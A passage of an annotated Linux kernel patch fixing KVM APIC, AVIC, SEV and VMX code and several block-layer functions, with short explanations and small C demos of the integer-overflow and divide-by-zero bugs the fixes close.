++		val = kvm_lapic_get_reg(apic, offset);
+ 		kvm_lapic_reg_write(apic, offset, (u32)val);
+ 	}
+ }
+@@ -2429,6 +2436,7 @@ void kvm_apic_update_apicv(struct kvm_vcpu *vcpu)
+ 		 */
+ 		apic->isr_count = count_vectors(apic->regs + APIC_ISR);
+ 	}
++	apic->highest_isr_cache = -1;
+ }
+ EXPORT_SYMBOL_GPL(kvm_apic_update_apicv);
+ 
+@@ -2485,7 +2493,6 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+ 		kvm_lapic_set_reg(apic, APIC_TMR + 0x10 * i, 0);
+ 	}
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	update_divide_count(apic);
+ 	atomic_set(&apic->lapic_timer.pending, 0);
+ 
+@@ -2773,7 +2780,6 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	__start_apic_timer(apic, APIC_TMCCT);
+ 	kvm_lapic_set_reg(apic, APIC_TMCCT, 0);
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	if (apic->apicv_active) {
+ 		static_call_cond(kvm_x86_apicv_post_state_restore)(vcpu);
+ 		static_call_cond(kvm_x86_hwapic_irr_update)(vcpu, apic_find_highest_irr(apic));
+@@ -2944,13 +2950,17 @@ static int kvm_lapic_msr_read(struct kvm_lapic *apic, u32 reg, u64 *data)
+ static int kvm_lapic_msr_write(struct kvm_lapic *apic, u32 reg, u64 data)
+ {
+ 	/*
+-	 * ICR is a 64-bit register in x2APIC mode (and Hyper'v PV vAPIC) and
++	 * ICR is a 64-bit register in x2APIC mode (and Hyper-V PV vAPIC) and
+ 	 * can be written as such, all other registers remain accessible only
+ 	 * through 32-bit reads/writes.
+ 	 */
+ 	if (reg == APIC_ICR)
+ 		return kvm_x2apic_icr_write(apic, data);
+ 
++	/* Bits 63:32 are reserved in all other registers. */
++	if (data >> 32)
++		return 1;
++
+ 	return kvm_lapic_reg_write(apic, reg, (u32)data);
+ }
+ 
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 6919dee69f182..97ad0661f9639 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -86,6 +86,12 @@ static void avic_activate_vmcb(struct vcpu_svm *svm)
+ 		/* Disabling MSR intercept for x2APIC registers */
+ 		svm_set_x2apic_msr_interception(svm, false);
+ 	} else {
++		/*
++		 * Flush the TLB, the guest may have inserted a non-APIC
++		 * mapping into the TLB while AVIC was disabled.
++		 */
++		kvm_make_request(KVM_REQ_TLB_FLUSH_CURRENT, &svm->vcpu);
++
+ 		/* For xAVIC and hybrid-xAVIC modes */
+ 		vmcb->control.avic_physical_id |= AVIC_MAX_PHYSICAL_ID;
+ 		/* Enabling MSR intercept for x2APIC registers */
+@@ -496,14 +502,18 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 	trace_kvm_avic_incomplete_ipi(vcpu->vcpu_id, icrh, icrl, id, index);
+ 
+ 	switch (id) {
++	case AVIC_IPI_FAILURE_INVALID_TARGET:
+ 	case AVIC_IPI_FAILURE_INVALID_INT_TYPE:
+ 		/*
+ 		 * Emulate IPIs that are not handled by AVIC hardware, which
+-		 * only virtualizes Fixed, Edge-Triggered INTRs.  The exit is
+-		 * a trap, e.g. ICR holds the correct value and RIP has been
+-		 * advanced, KVM is responsible only for emulating the IPI.
+-		 * Sadly, hardware may sometimes leave the BUSY flag set, in
+-		 * which case KVM needs to emulate the ICR write as well in
++		 * only virtualizes Fixed, Edge-Triggered INTRs, and falls over
++		 * if _any_ targets are invalid, e.g. if the logical mode mask
++		 * is a superset of running vCPUs.
++		 *
++		 * The exit is a trap, e.g. ICR holds the correct value and RIP
++		 * has been advanced, KVM is responsible only for emulating the
++		 * IPI.  Sadly, hardware may sometimes leave the BUSY flag set,
++		 * in which case KVM needs to emulate the ICR write as well in
+ 		 * order to clear the BUSY flag.
+ 		 */
+ 		if (icrl & APIC_ICR_BUSY)
+@@ -519,8 +529,6 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 		 */
+ 		avic_kick_target_vcpus(vcpu->kvm, apic, icrl, icrh, index);
+ 		break;
+-	case AVIC_IPI_FAILURE_INVALID_TARGET:
+-		break;
+ 	case AVIC_IPI_FAILURE_INVALID_BACKING_PAGE:
+ 		WARN_ONCE(1, "Invalid backing page\n");
+ 		break;
+@@ -739,18 +747,6 @@ void avic_apicv_post_state_restore(struct kvm_vcpu *vcpu)
+ 	avic_handle_ldr_update(vcpu);
+ }
+ 
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu)
+-{
+-	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
+-		return;
+-
+-	if (kvm_get_apic_mode(vcpu) == LAPIC_MODE_INVALID) {
+-		WARN_ONCE(true, "Invalid local APIC state (vcpu_id=%d)", vcpu->vcpu_id);
+-		return;
+-	}
+-	avic_refresh_apicv_exec_ctrl(vcpu);
+-}
+-
+ static int avic_set_pi_irte_mode(struct kvm_vcpu *vcpu, bool activate)
+ {
+ 	int ret = 0;
+@@ -1092,17 +1088,18 @@ void avic_vcpu_put(struct kvm_vcpu *vcpu)
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
+ }
+ 
+-
+-void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 	struct vmcb *vmcb = svm->vmcb01.ptr;
+-	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
++		return;
+ 
+ 	if (!enable_apicv)
+ 		return;
+ 
+-	if (activated) {
++	if (kvm_vcpu_apicv_active(vcpu)) {
+ 		/**
+ 		 * During AVIC temporary deactivation, guest could update
+ 		 * APIC ID, DFR and LDR registers, which would not be trapped
+@@ -1116,6 +1113,16 @@ void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
+ 		avic_deactivate_vmcb(svm);
+ 	}
+ 	vmcb_mark_dirty(vmcb, VMCB_AVIC);
++}
++
++void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++{
++	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!enable_apicv)
++		return;
++
++	avic_refresh_virtual_apic_mode(vcpu);
+ 
+ 	if (activated)
+ 		avic_vcpu_load(vcpu, vcpu->cpu);
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index efaaef2b7ae11..4cb2e483db533 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1293,7 +1293,7 @@ static int sev_send_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* Pin guest memory */
+@@ -1473,7 +1473,7 @@ static int sev_receive_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	hdr = psp_copy_user_blob(params.hdr_uaddr, params.hdr_len);
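
The extra params.guest_len > PAGE_SIZE test in both SEV hunks is an unsigned overflow guard: when guest_len is close to the type's maximum, guest_len + offset wraps past zero and sails under the old single comparison. A sketch of the failure mode and the fix, with an illustrative page size and 32-bit lengths:

#include <stdint.h>
#include <stdio.h>

#define PAGE_SIZE 4096u

/* Old check: wraps when len + off overflows the 32-bit type. */
static int old_check(uint32_t len, uint32_t off)
{
	return (len + off > PAGE_SIZE) ? -1 : 0;
}

/* Fixed check: reject oversized lengths before doing the addition. */
static int new_check(uint32_t len, uint32_t off)
{
	return (len > PAGE_SIZE || len + off > PAGE_SIZE) ? -1 : 0;
}

int main(void)
{
	uint32_t len = UINT32_MAX - 10, off = 100;	/* len + off wraps to 89 */

	printf("old: %d\n", old_check(len, off));	/* 0: slips through */
	printf("new: %d\n", new_check(len, off));	/* -1: rejected */
	return 0;
}
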
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 0434bb7b456bd..bfe93a1c4f92e 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -4757,7 +4757,7 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.enable_nmi_window = svm_enable_nmi_window,
+ 	.enable_irq_window = svm_enable_irq_window,
+ 	.update_cr8_intercept = svm_update_cr8_intercept,
+-	.set_virtual_apic_mode = avic_set_virtual_apic_mode,
++	.set_virtual_apic_mode = avic_refresh_virtual_apic_mode,
+ 	.refresh_apicv_exec_ctrl = avic_refresh_apicv_exec_ctrl,
+ 	.check_apicv_inhibit_reasons = avic_check_apicv_inhibit_reasons,
+ 	.apicv_post_state_restore = avic_apicv_post_state_restore,
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index 199a2ecef1cec..bbc061f3a2b37 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -645,7 +645,7 @@ void avic_vcpu_blocking(struct kvm_vcpu *vcpu);
+ void avic_vcpu_unblocking(struct kvm_vcpu *vcpu);
+ void avic_ring_doorbell(struct kvm_vcpu *vcpu);
+ unsigned long avic_vcpu_get_apicv_inhibit_reasons(struct kvm_vcpu *vcpu);
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu);
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu);
+ 
+ 
+ /* sev.c */
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index e2fc593804657..4387173576d5e 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -28,7 +28,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ 		hve->hv_enlightenments_control.msr_bitmap = 1;
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ 	if (npt_enabled &&
+ 	    ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB) {
+@@ -85,7 +85,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ }
+ 
+diff --git a/arch/x86/kvm/vmx/evmcs.h b/arch/x86/kvm/vmx/evmcs.h
+index 6f746ef3c0386..1bc4e8408b4b2 100644
+--- a/arch/x86/kvm/vmx/evmcs.h
++++ b/arch/x86/kvm/vmx/evmcs.h
+@@ -188,16 +188,6 @@ static inline u16 evmcs_read16(unsigned long field)
+ 	return *(u16 *)((char *)current_evmcs + offset);
+ }
+ 
+-static inline void evmcs_touch_msr_bitmap(void)
+-{
+-	if (unlikely(!current_evmcs))
+-		return;
+-
+-	if (current_evmcs->hv_enlightenments_control.msr_bitmap)
+-		current_evmcs->hv_clean_fields &=
+-			~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
+-}
+-
+ static inline void evmcs_load(u64 phys_addr)
+ {
+ 	struct hv_vp_assist_page *vp_ap =
+@@ -217,7 +207,6 @@ static inline u64 evmcs_read64(unsigned long field) { return 0; }
+ static inline u32 evmcs_read32(unsigned long field) { return 0; }
+ static inline u16 evmcs_read16(unsigned long field) { return 0; }
+ static inline void evmcs_load(u64 phys_addr) {}
+-static inline void evmcs_touch_msr_bitmap(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ #define EVMPTR_INVALID (-1ULL)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 95ed874fbbcc3..f5c1cb7cec8a7 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -3839,8 +3839,13 @@ static void vmx_msr_bitmap_l01_changed(struct vcpu_vmx *vmx)
+ 	 * 'Enlightened MSR Bitmap' feature L0 needs to know that MSR
+ 	 * bitmap has changed.
+ 	 */
+-	if (static_branch_unlikely(&enable_evmcs))
+-		evmcs_touch_msr_bitmap();
++	if (IS_ENABLED(CONFIG_HYPERV) && static_branch_unlikely(&enable_evmcs)) {
++		struct hv_enlightened_vmcs *evmcs = (void *)vmx->vmcs01.vmcs;
++
++		if (evmcs->hv_enlightenments_control.msr_bitmap)
++			evmcs->hv_clean_fields &=
++				~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
++	}
+ 
+ 	vmx->nested.force_msr_bitmap_recalc = true;
+ }
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 3f5685c00e360..91ffee6fc8cb4 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -418,6 +418,7 @@ int bio_integrity_clone(struct bio *bio, struct bio *bio_src,
+ 
+ 	bip->bip_vcnt = bip_src->bip_vcnt;
+ 	bip->bip_iter = bip_src->bip_iter;
++	bip->bip_flags = bip_src->bip_flags & ~BIP_BLOCK_INTEGRITY;
+ 
+ 	return 0;
+ }
+diff --git a/block/bio.c b/block/bio.c
+index 57c2f327225bd..d5cd825d6efc0 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -747,6 +747,7 @@ void bio_put(struct bio *bio)
+ 		bio_uninit(bio);
+ 		cache = per_cpu_ptr(bio->bi_pool->cache, get_cpu());
+ 		bio->bi_next = cache->free_list;
++		bio->bi_bdev = NULL;
+ 		cache->free_list = bio;
+ 		if (++cache->nr > ALLOC_CACHE_MAX + ALLOC_CACHE_SLACK)
+ 			bio_alloc_cache_prune(cache, ALLOC_CACHE_SLACK);
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 7c91d9195da8d..f8b21bead6552 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -87,14 +87,32 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
++	struct request_queue *q = blkg->q;
+ 	int i;
+ 
++	/*
++	 * pd_free_fn() can also be called from blkcg_deactivate_policy().
++	 * To make sure pd_free_fn() is called in order, the removal of blkg
++	 * from the queue list (blkg->q_node) is delayed to here from
++	 * blkg_destroy(), and blkcg_mutex is used to synchronize
++	 * blkg_free_workfn() and blkcg_deactivate_policy().
++	 */
++	if (q)
++		mutex_lock(&q->blkcg_mutex);
++
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->q)
+-		blk_put_queue(blkg->q);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
++
++	if (q) {
++		list_del_init(&blkg->q_node);
++		mutex_unlock(&q->blkcg_mutex);
++		blk_put_queue(q);
++	}
++
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -127,8 +145,6 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -425,9 +441,14 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/* Something wrong if we are trying to remove same group twice */
+-	WARN_ON_ONCE(list_empty(&blkg->q_node));
+-	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
++	/*
++	 * blkg stays on the queue list until blkg_free_workfn(), see details in
++	 * blkg_free_workfn(), hence this function can be called from
++	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
++	 * blkg_free_workfn().
++	 */
++	if (hlist_unhashed(&blkg->blkcg_node))
++		return;
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -439,7 +460,6 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
+-	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1226,6 +1246,7 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
++	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1463,6 +1484,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
++	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1481,6 +1503,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
++	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 5487912befe89..24ee7785a5ad5 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -672,6 +672,18 @@ static void __submit_bio_noacct_mq(struct bio *bio)
+ 
+ void submit_bio_noacct_nocheck(struct bio *bio)
+ {
++	blk_cgroup_bio_start(bio);
++	blkcg_bio_issue_init(bio);
++
++	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
++		trace_block_bio_queue(bio);
++		/*
++		 * Now that enqueuing has been traced, we need to trace
++		 * completion as well.
++		 */
++		bio_set_flag(bio, BIO_TRACE_COMPLETION);
++	}
++
+ 	/*
+ 	 * We only want one ->submit_bio to be active at a time, else stack
+ 	 * usage with stacked devices could be a problem.  Use current->bio_list
+@@ -776,17 +788,6 @@ void submit_bio_noacct(struct bio *bio)
+ 
+ 	if (blk_throtl_bio(bio))
+ 		return;
+-
+-	blk_cgroup_bio_start(bio);
+-	blkcg_bio_issue_init(bio);
+-
+-	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
+-		trace_block_bio_queue(bio);
+-		/* Now that enqueuing has been traced, we need to trace
+-		 * completion as well.
+-		 */
+-		bio_set_flag(bio, BIO_TRACE_COMPLETION);
+-	}
+ 	submit_bio_noacct_nocheck(bio);
+ 	return;
+ 
+@@ -841,10 +842,16 @@ EXPORT_SYMBOL(submit_bio);
+  */
+ int bio_poll(struct bio *bio, struct io_comp_batch *iob, unsigned int flags)
+ {
+-	struct request_queue *q = bdev_get_queue(bio->bi_bdev);
+ 	blk_qc_t cookie = READ_ONCE(bio->bi_cookie);
++	struct block_device *bdev;
++	struct request_queue *q;
+ 	int ret = 0;
+ 
++	bdev = READ_ONCE(bio->bi_bdev);
++	if (!bdev)
++		return 0;
++
++	q = bdev_get_queue(bdev);
+ 	if (cookie == BLK_QC_T_NONE ||
+ 	    !test_bit(QUEUE_FLAG_POLL, &q->queue_flags))
+ 		return 0;
+@@ -904,7 +911,7 @@ int iocb_bio_iopoll(struct kiocb *kiocb, struct io_comp_batch *iob,
+ 	 */
+ 	rcu_read_lock();
+ 	bio = READ_ONCE(kiocb->private);
+-	if (bio && bio->bi_bdev)
++	if (bio)
+ 		ret = bio_poll(bio, iob, flags);
+ 	rcu_read_unlock();
+ 
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 495396425bade..bfc33fa9a063c 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -865,9 +865,14 @@ static void calc_lcoefs(u64 bps, u64 seqiops, u64 randiops,
+ 
+ 	*page = *seqio = *randio = 0;
+ 
+-	if (bps)
+-		*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC,
+-					   DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE));
++	if (bps) {
++		u64 bps_pages = DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE);
++
++		if (bps_pages)
++			*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC, bps_pages);
++		else
++			*page = 1;
++	}
+ 
+ 	if (seqiops) {
+ 		v = DIV64_U64_ROUND_UP(VTIME_PER_SEC, seqiops);
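
The iocost hunk guards against a divide-by-zero that the round-up itself can manufacture: DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE) computes (bps + IOC_PAGE_SIZE - 1) / IOC_PAGE_SIZE, and for bps near U64_MAX the addition wraps, leaving zero pages to divide by. A minimal reproduction of the overflow and the clamp, with illustrative constants:

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

#define IOC_PAGE_SIZE	4096ull
#define VTIME_PER_SEC	1000000000ull	/* illustrative, not the kernel's */

/* (x + d - 1) / d, the usual round-up; wraps when x is near UINT64_MAX. */
static uint64_t div_round_up(uint64_t x, uint64_t d)
{
	return (x + d - 1) / d;
}

int main(void)
{
	uint64_t bps = UINT64_MAX;		/* user-controlled rate */
	uint64_t pages = div_round_up(bps, IOC_PAGE_SIZE);

	printf("pages = %" PRIu64 "\n", pages);	/* 0: the addition wrapped */
	if (!pages)
		pages = 1;			/* the fix: clamp to one page */
	printf("cost = %" PRIu64 "\n", div_round_up(VTIME_PER_SEC, pages));
	return 0;
}
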
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index 84f03d066cb31..17ac532105a97 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -747,6 +747,33 @@ void blk_rq_set_mixed_merge(struct request *rq)
+ 	rq->rq_flags |= RQF_MIXED_MERGE;
+ }
+ 
++static inline blk_opf_t bio_failfast(const struct bio *bio)
++{
++	if (bio->bi_opf & REQ_RAHEAD)
++		return REQ_FAILFAST_MASK;
++
++	return bio->bi_opf & REQ_FAILFAST_MASK;
++}
++
++/*
++ * After the request is marked as MIXED_MERGE, any new RA bio has to be
++ * marked as failfast, and the request's failfast bits have to be updated
++ * in case of a front merge.
++ */
++static inline void blk_update_mixed_merge(struct request *req,
++		struct bio *bio, bool front_merge)
++{
++	if (req->rq_flags & RQF_MIXED_MERGE) {
++		if (bio->bi_opf & REQ_RAHEAD)
++			bio->bi_opf |= REQ_FAILFAST_MASK;
++
++		if (front_merge) {
++			req->cmd_flags &= ~REQ_FAILFAST_MASK;
++			req->cmd_flags |= bio->bi_opf & REQ_FAILFAST_MASK;
++		}
++	}
++}
++
+ static void blk_account_io_merge_request(struct request *req)
+ {
+ 	if (blk_do_io_stat(req)) {
+@@ -944,7 +971,7 @@ enum bio_merge_status {
+ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_back_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -955,6 +982,8 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, false);
++
+ 	req->biotail->bi_next = bio;
+ 	req->biotail = bio;
+ 	req->__data_len += bio->bi_iter.bi_size;
+@@ -968,7 +997,7 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_front_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -979,6 +1008,8 @@ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, true);
++
+ 	bio->bi_next = req->bio;
+ 	req->bio = bio;
+ 
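
bio_failfast() reports the full failfast mask for readahead bios, and blk_update_mixed_merge() keeps a mixed-merge request consistent when such a bio is merged, including taking over the head bio's bits on a front merge. The flag arithmetic on its own, in a small sketch; the bit values are illustrative, not the kernel's:

#include <stdio.h>

#define REQ_FAILFAST_MASK	0x7u	/* illustrative failfast bits */
#define REQ_RAHEAD		0x8u

/* Readahead is best-effort, so treat it as fully failfast when merging. */
static unsigned int bio_failfast(unsigned int bi_opf)
{
	if (bi_opf & REQ_RAHEAD)
		return REQ_FAILFAST_MASK;
	return bi_opf & REQ_FAILFAST_MASK;
}

/* On a front merge, the request inherits the new head bio's failfast bits. */
static unsigned int front_merge_flags(unsigned int req_flags,
				      unsigned int bio_opf)
{
	req_flags &= ~REQ_FAILFAST_MASK;
	return req_flags | (bio_opf & REQ_FAILFAST_MASK);
}

int main(void)
{
	printf("ra bio: %#x\n", bio_failfast(REQ_RAHEAD));	/* 0x7 */
	printf("merged: %#x\n", front_merge_flags(0x7, 0x1));	/* 0x1 */
	return 0;
}
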
+diff --git a/block/blk-mq-sched.c b/block/blk-mq-sched.c
+index a4f7c101b53b2..91fb5d1465cac 100644
+--- a/block/blk-mq-sched.c
++++ b/block/blk-mq-sched.c
+@@ -19,8 +19,7 @@
+ #include "blk-wbt.h"
+ 
+ /*
+- * Mark a hardware queue as needing a restart. For shared queues, maintain
+- * a count of how many hardware queues are marked for restart.
++ * Mark a hardware queue as needing a restart.
+  */
+ void blk_mq_sched_mark_restart_hctx(struct blk_mq_hw_ctx *hctx)
+ {
+@@ -82,7 +81,7 @@ dispatch:
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+@@ -210,7 +209,7 @@ static struct blk_mq_ctx *blk_mq_next_ctx(struct blk_mq_hw_ctx *hctx,
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 83fbc7c546172..fe0a3a882f465 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -626,7 +626,8 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ 	 * allocator for this for the rare use case of a command tied to
+ 	 * a specific queue.
+ 	 */
+-	if (WARN_ON_ONCE(!(flags & (BLK_MQ_REQ_NOWAIT | BLK_MQ_REQ_RESERVED))))
++	if (WARN_ON_ONCE(!(flags & BLK_MQ_REQ_NOWAIT)) ||
++	    WARN_ON_ONCE(!(flags & BLK_MQ_REQ_RESERVED)))
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	if (hctx_idx >= q->nr_hw_queues)
+@@ -1793,12 +1794,13 @@ static int blk_mq_dispatch_wake(wait_queue_entry_t *wait, unsigned mode,
+ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 				 struct request *rq)
+ {
+-	struct sbitmap_queue *sbq = &hctx->tags->bitmap_tags;
++	struct sbitmap_queue *sbq;
+ 	struct wait_queue_head *wq;
+ 	wait_queue_entry_t *wait;
+ 	bool ret;
+ 
+-	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED)) {
++	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) &&
++	    !(blk_mq_is_shared_tags(hctx->flags))) {
+ 		blk_mq_sched_mark_restart_hctx(hctx);
+ 
+ 		/*
+@@ -1816,6 +1818,10 @@ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 	if (!list_empty_careful(&wait->entry))
+ 		return false;
+ 
++	if (blk_mq_tag_is_reserved(rq->mq_hctx->sched_tags, rq->internal_tag))
++		sbq = &hctx->tags->breserved_tags;
++	else
++		sbq = &hctx->tags->bitmap_tags;
+ 	wq = &bt_wait_ptr(sbq, hctx)->wait;
+ 
+ 	spin_lock_irq(&wq->lock);
+@@ -2064,7 +2070,8 @@ out:
+ 		bool needs_restart;
+ 		/* For non-shared tags, the RESTART check will suffice */
+ 		bool no_tag = prep == PREP_DISPATCH_NO_TAG &&
+-			(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED);
++			((hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) ||
++			blk_mq_is_shared_tags(hctx->flags));
